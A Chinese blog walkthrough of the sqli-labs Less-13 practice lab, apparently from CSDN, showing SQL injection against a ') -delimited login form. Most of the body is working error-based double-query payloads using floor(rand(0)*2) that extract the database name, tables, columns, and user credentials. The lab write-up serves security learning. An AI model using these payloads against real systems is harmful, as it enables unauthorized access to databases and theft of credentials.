sqli-labs less13

本文详细解析了sqli-labs less13关卡的SQL注入攻击过程,通过判断注入类型,确定字段数,并利用报错型注入爆破数据库名称、表名、列名及数据,展示了双查询注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#sqli-labs less13

由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13

对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。

然后我们发现他是’)

所以我们继续往下走

admin ’ order by n #

发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现
在这里插入图片描述

所以可以判断字段数为2

接下来试试admin ') union select 1,2 #

发现没有回显位,试试 在 passwd 后面添加 11’) union select 1,2 #

发现还是没有
在这里插入图片描述

。。。

再能试试报错型注入

爆数据库名称

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),database())as x from information_schema.tables group by x)as a)–+

在这里插入图片描述

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name)from information_schema.tables where table_schema=‘security’ limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(column_name)from information_schema.columns where table_name=‘users’ limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(password)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#

.

.

.

.

也可以用双查询注入
')union select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值